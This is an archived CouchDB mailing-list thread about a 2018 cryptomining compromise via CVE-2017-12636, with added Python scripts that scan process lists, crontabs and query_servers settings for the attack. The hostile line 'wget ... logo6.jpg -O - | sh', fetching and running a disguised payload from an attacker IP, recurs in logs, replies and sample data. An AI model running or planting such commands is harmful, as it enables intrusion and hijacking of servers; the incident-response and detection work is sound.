Posted to user@couchdb.apache.org by Michael Bykov <m....@gmail.com> on 2018/02/16 11:31:49 UTC
logo6
I see now in logs:
couchdb 31167 0.0 0.0 6684 992 ? SNs 22:21 0:00 \_ /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh
couchdb 31169 0.0 0.0 6684 1136 ? SN 22:21 0:00 | \_ sh
couchdb 31264 0.0 0.0 4156 564 ? SN 22:21 0:00 | \_ sleep 60
couchdb 31193 0.0 0.1 55968 3772 ? SN 22:21 0:00 \_ /usr/sbin/sendmail -FCronDaemon -odi -oem -oi -t
What should be done?
--
М.
http://diglossa.ru
xmpp://m.bykov@jabber.ru
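The process tree above is the classic fetch-and-run stage: a cron job spawns sh, which downloads a "jpg" and pipes it straight into another sh. The following Python scanner is an added example, not code from the original post or from the CouchDB project. It applies that pattern to ps output and crontab text, flags the image-extension disguise, and records which user and PID are running it. The sample ps and crontab lines are constructed to mirror the listing above (the beam.smp line is added for contrast), and the cron spool paths are the usual Debian/Ubuntu and RHEL/CentOS locations.

```python
import re
import subprocess

# Constructed sample modelled on the ps output in the post above; not a live capture.
# The last line is a normal CouchDB process added here for contrast.
SAMPLE_PS = """\
couchdb 31167 0.0 0.0 6684 992 ? SNs 22:21 0:00 \\_ /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh
couchdb 31169 0.0 0.0 6684 1136 ? SN 22:21 0:00 | \\_ sh
couchdb 31264 0.0 0.0 4156 564 ? SN 22:21 0:00 | \\_ sleep 60
couchdb 31193 0.0 0.1 55968 3772 ? SN 22:21 0:00 \\_ /usr/sbin/sendmail -FCronDaemon -odi -oem -oi -t
couchdb 30901 0.2 1.1 412000 45000 ? Ssl 21:00 0:12 /usr/bin/beam.smp -- -name couchdb
"""

# Constructed crontab line of the kind the thread reports in the couchdb user's crontab.
SAMPLE_CRON = "*/5 * * * * wget -q http://94.250.253.178/logo6.jpg -O - | sh\n"

# Where per-user and system crontabs live on Debian/Ubuntu and RHEL/CentOS (assumed paths).
CRON_LOCATIONS = ("/var/spool/cron/crontabs", "/var/spool/cron", "/etc/cron.d", "/etc/crontab")

# A downloader whose output is piped straight into a shell: the fetch-and-run stage.
DOWNLOAD_EXEC = re.compile(r"\b(?:wget|curl)\b[^|;&\n]*\|\s*(?:/bin/)?(?:ba)?sh\b")
URL_RE = re.compile(r"https?://[^\s'\"]+")
IMAGE_EXT = re.compile(r"\.(?:jpe?g|png|gif|bmp|ico)$", re.IGNORECASE)


def find_download_exec(text):
    """Return one dict per line of `text` in which a fetched body is piped into sh."""
    hits = []
    for line in text.splitlines():
        if not DOWNLOAD_EXEC.search(line):
            continue
        m = URL_RE.search(line)
        url = m.group(0) if m else None
        hits.append({
            "line": line.strip(),
            "url": url,
            # A "picture" that is executed by sh is a disguise, not an image.
            "disguised": bool(url and IMAGE_EXT.search(url.split("?", 1)[0])),
        })
    return hits


def scan_ps(ps_text):
    """Apply find_download_exec to `ps auxf` output and pull user and PID from each hit."""
    hits = []
    for hit in find_download_exec(ps_text):
        user, pid = hit["line"].split()[:2]
        hit["user"], hit["pid"] = user, int(pid)
        hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan_ps(SAMPLE_PS):
        print("sample: user=%(user)s pid=%(pid)d url=%(url)s disguised=%(disguised)s" % hit)
    for hit in find_download_exec(SAMPLE_CRON):
        print("sample cron: url=%(url)s disguised=%(disguised)s" % hit)
    # On a real host, scan the live process table the same way.
    try:
        live = subprocess.run(["ps", "auxf"], capture_output=True, text=True, check=True).stdout
        for hit in scan_ps(live):
            print("LIVE: user=%(user)s pid=%(pid)d url=%(url)s" % hit)
    except (OSError, subprocess.CalledProcessError):
        print("ps not available here; check crontabs under", ", ".join(CRON_LOCATIONS))
```

Run it as root so `ps auxf` shows every user's processes, then read the couchdb user's crontab under the listed spool paths and `/etc/cron.d`. A hit tells you what is running and from where, not how it got there; the origin is a separate question.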
Re: logo6
Posted by Brian Johnston | Owner | Alpine Tech Solutions <br...@usa.net>.
The hackers are changing the name of the script to other names like logo4. It
took my CouchDB down for a while and now has subsided. I searched the crontab
of all the accounts and could not find evidence there. They must have evolved
to another method of execution once it gets installed....
------ Original Message ------
Received: 06:15 AM MST, 02/22/2018
From: Michael Bykov <m....@gmail.com>
To: user@couchdb.apache.org
Subject: Re: logo6
2018-02-18 0:20 GMT+03:00 Robert Samuel Newson <rn...@apache.org>:
> sounds like http://docs.couchdb.org/en/2.1.1/cve/2017-12636.html
I have found the malware script in the crontab of user couchdb.
This very line: /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh
And yes, my version was 1.6
>
>
> B.
>
> > On 16 Feb 2018, at 11:50, Ingo Radatz <th...@googlemail.com> wrote:
> >
> > Hi Michael,
> >
> > I have experienced the same; this is a mining script. You can find the
> > shell scripts in /tmp and in new database folders of your CouchDB (1.6.1?)
> > installation. Finally I moved to a new VM because the script could
> > install itself again and again.
> >
> > Ingo
> >
> >> On 16. Feb 2018, at 12:31, Michael Bykov <m....@gmail.com> wrote:
> >>
> >> I see now in logs:
> >>
> >> couchdb 31167 0.0 0.0 6684 992 ? SNs 22:21 0:00 \_
> >> /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh
> >> couchdb 31169 0.0 0.0 6684 1136 ? SN 22:21 0:00 |
> >> \_ sh
> >> couchdb 31264 0.0 0.0 4156 564 ? SN 22:21 0:00 |
> >> \_ sleep 60
> >> couchdb 31193 0.0 0.1 55968 3772 ? SN 22:21 0:00 \_
> >> /usr/sbin/sendmail -FCronDaemon -odi -oem -oi -t
> >>
> >> What should be done?
> >>
> >>
> >> --
> >> М.
> >>
> >> http://diglossa.ru
> >> xmpp://m.bykov@jabber.ru
> >
>
>
--
М.
http://diglossa.ru
xmpp://m.bykov@jabber.ru
Re: logo6
Posted by Michael Bykov <m....@gmail.com>.
2018-02-18 0:20 GMT+03:00 Robert Samuel Newson <rn...@apache.org>:
> sounds like http://docs.couchdb.org/en/2.1.1/cve/2017-12636.html
I have found the malware script in the crontab of user couchdb.
This very line: /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh
And yes, my version was 1.6
>
>
> B.
>
> > On 16 Feb 2018, at 11:50, Ingo Radatz <th...@googlemail.com> wrote:
> >
> > Hi Michael,
> >
> > I have experienced the same; this is a mining script. You can find the
> > shell scripts in /tmp and in new database folders of your CouchDB (1.6.1?)
> > installation. Finally I moved to a new VM because the script could
> > install itself again and again.
> >
> > Ingo
> >
> >> On 16. Feb 2018, at 12:31, Michael Bykov <m....@gmail.com> wrote:
> >>
> >> I see now in logs:
> >>
> >> couchdb 31167 0.0 0.0 6684 992 ? SNs 22:21 0:00 \_
> >> /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh
> >> couchdb 31169 0.0 0.0 6684 1136 ? SN 22:21 0:00 |
> >> \_ sh
> >> couchdb 31264 0.0 0.0 4156 564 ? SN 22:21 0:00 |
> >> \_ sleep 60
> >> couchdb 31193 0.0 0.1 55968 3772 ? SN 22:21 0:00 \_
> >> /usr/sbin/sendmail -FCronDaemon -odi -oem -oi -t
> >>
> >> What should be done?
> >>
> >>
> >> --
> >> М.
> >>
> >> http://diglossa.ru
> >> xmpp://m.bykov@jabber.ru
> >
>
>
--
М.
http://diglossa.ru
xmpp://m.bykov@jabber.ru
Re: logo6
Posted by Robert Samuel Newson <rn...@apache.org>.
sounds like http://docs.couchdb.org/en/2.1.1/cve/2017-12636.html
B.
> On 16 Feb 2018, at 11:50, Ingo Radatz <th...@googlemail.com> wrote:
>
> Hi Michael,
>
> I have experienced the same; this is a mining script. You can find the shell scripts in /tmp and in new database folders of your CouchDB (1.6.1?) installation. Finally I moved to a new VM because the script could install itself again and again.
>
> Ingo
>
>> On 16. Feb 2018, at 12:31, Michael Bykov <m....@gmail.com> wrote:
>>
>> I see now in logs:
>>
>> couchdb 31167 0.0 0.0 6684 992 ? SNs 22:21 0:00 \_
>> /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh
>> couchdb 31169 0.0 0.0 6684 1136 ? SN 22:21 0:00 |
>> \_ sh
>> couchdb 31264 0.0 0.0 4156 564 ? SN 22:21 0:00 |
>> \_ sleep 60
>> couchdb 31193 0.0 0.1 55968 3772 ? SN 22:21 0:00 \_
>> /usr/sbin/sendmail -FCronDaemon -odi -oem -oi -t
>>
>> What should be done?
>>
>>
>> --
>> М.
>>
>> http://diglossa.ru
>> xmpp://m.bykov@jabber.ru
>
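CVE-2017-12636, linked above, is the issue that an administrator could change the `query_servers` configuration section over HTTP on CouchDB 1.x and 2.x; each value in that section is a command line the server executes to start a query server, so the section is a code-execution sink. The following audit script is an added example, not code from the original thread or from the CouchDB project. It reads the JSON that `GET /_config/query_servers` returns on a 1.x node and flags any entry that is not a plain couchjs invocation. The sample response is constructed: the javascript and coffeescript entries are the stock Debian values, and the third entry is invented to show the shape of something that should never be there. The expected-binary set and the server URL and credentials in the usage comment are assumptions.

```python
import base64
import json
import re
import urllib.request

# Constructed sample of a GET /_config/query_servers response from a CouchDB 1.x
# node. The javascript/coffeescript entries are the stock Debian values; the third
# entry is constructed to show the shape of an entry that should never be present.
SAMPLE_CONFIG = json.loads("""
{"javascript": "/usr/bin/couchjs /usr/share/couchdb/server/main.js",
 "coffeescript": "/usr/bin/couchjs /usr/share/couchdb/server/main-coffee.js",
 "cmd": "/bin/sh -c 'wget -q http://94.250.253.178/logo6.jpg -O - | sh'"}
""")

# Assumption: every legitimate query server on this host is launched via couchjs.
EXPECTED_BINARIES = frozenset({"couchjs"})
SHELL_META = re.compile(r"[|;&`$<>]")
DOWNLOADER = re.compile(r"\b(?:wget|curl)\b")


def audit_query_servers(config, expected=EXPECTED_BINARIES):
    """Flag query-server entries whose command is not a plain couchjs invocation.

    Each value in the section is a command line CouchDB execs when a design
    document first uses that language, so any unexpected entry is a backdoor.
    """
    findings = []
    for language, command in config.items():
        argv = command.split()
        binary = argv[0].rsplit("/", 1)[-1] if argv else ""
        reasons = []
        if binary not in expected:
            reasons.append("unexpected executable %r" % (argv[0] if argv else ""))
        if SHELL_META.search(command):
            reasons.append("shell metacharacters in command")
        if DOWNLOADER.search(command):
            reasons.append("downloader in command")
        if reasons:
            findings.append({"language": language, "command": command, "reasons": reasons})
    return findings


def fetch_config_section(base_url, user, password, section="query_servers"):
    """GET /_config/<section> as admin from a 1.x node (on 2.x the path is /_node/<name>/_config/<section>)."""
    req = urllib.request.Request("%s/_config/%s" % (base_url.rstrip("/"), section))
    token = base64.b64encode(("%s:%s" % (user, password)).encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


if __name__ == "__main__":
    # Offline demonstration on the constructed sample.
    for f in audit_query_servers(SAMPLE_CONFIG):
        print("%s: %s -> %s" % (f["language"], f["command"], "; ".join(f["reasons"])))
    # Against a real node (assumed URL and credentials; uncomment to use):
    # live = fetch_config_section("http://127.0.0.1:5984", "admin", "secret")
    # print(audit_query_servers(live))
```

Two caveats. A clean `query_servers` section does not mean a clean host: once the command has run it installs its own persistence (the crontab and /tmp scripts the thread describes), so the host needs the cron and process checks regardless. And the audit only confirms the symptom; the fix is upgrading to a release that refuses HTTP writes to this section (1.7.0 or 2.1.1, per the linked advisory), then rotating the admin credentials.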
Re: logo6
Posted by Ingo Radatz <th...@googlemail.com>.
Hi Michael,
I have experienced the same; this is a mining script. You can find the shell scripts in /tmp and in new database folders of your CouchDB (1.6.1?) installation. Finally I moved to a new VM because the script could install itself again and again.
Ingo
> On 16. Feb 2018, at 12:31, Michael Bykov <m....@gmail.com> wrote:
>
> I see now in logs:
>
> couchdb 31167 0.0 0.0 6684 992 ? SNs 22:21 0:00 \_
> /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh
> couchdb 31169 0.0 0.0 6684 1136 ? SN 22:21 0:00 |
> \_ sh
> couchdb 31264 0.0 0.0 4156 564 ? SN 22:21 0:00 |
> \_ sleep 60
> couchdb 31193 0.0 0.1 55968 3772 ? SN 22:21 0:00 \_
> /usr/sbin/sendmail -FCronDaemon -odi -oem -oi -t
>
> What should be done?
>
>
> --
> М.
>
> http://diglossa.ru
> xmpp://m.bykov@jabber.ru